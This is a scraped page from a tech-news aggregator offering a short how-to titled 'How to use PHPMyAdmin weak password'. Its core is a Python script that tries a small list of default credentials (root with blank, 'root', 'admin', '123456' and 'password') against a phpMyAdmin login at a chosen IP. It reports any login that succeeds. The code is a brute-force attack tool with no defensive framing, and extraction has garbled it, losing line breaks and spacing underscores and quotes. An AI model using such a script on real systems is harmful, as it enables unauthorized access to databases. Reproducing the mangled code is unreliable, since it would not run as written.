Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

How to use PHPMyAdmin weak password

2025-01-18 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Database >

Share

Shulou(Shulou.com)05/31 Report--

This article shows you how to use PHPMyAdmin weak password, the content is concise and easy to understand, can definitely brighten your eyes, through the detailed introduction of this article, I hope you can get something.

Test screenshot:

Code snippet

#! / usr/bin/env python# _ * _ coding:utf-8 _ * _ import requestsimport timeusername_list= ['root'] password_list= [' root','','admin','123456','password'] def phpMyAdmin (ip Port=80): for username in username_list: username = username.rstrip () for password in password_list: password = password.rstrip () try: # url = "http://192.168.106.141/phpmyadmin/index.php" Url = "http://"+ip+":"+str(port)+"/phpmyadmin/index.php" data= {'pma_username':username" 'pma_password':password} response = requests.post (url,data=data Timeout=5) result=response.content if result.find ('name= "login_form"') =-1: print'= = 'print' [+] find phpMyAdmin weak password:'+username Password print'= = 'break else: print' [-] Checking for'+ username Password+ "fail" except: print'[-] Something Error'+username,password+ "fail" if _ _ name__ ='_ _ main__': phpMyAdmin ("192.168.106.141")

The above is how to use PHPMyAdmin weak password. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Database

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report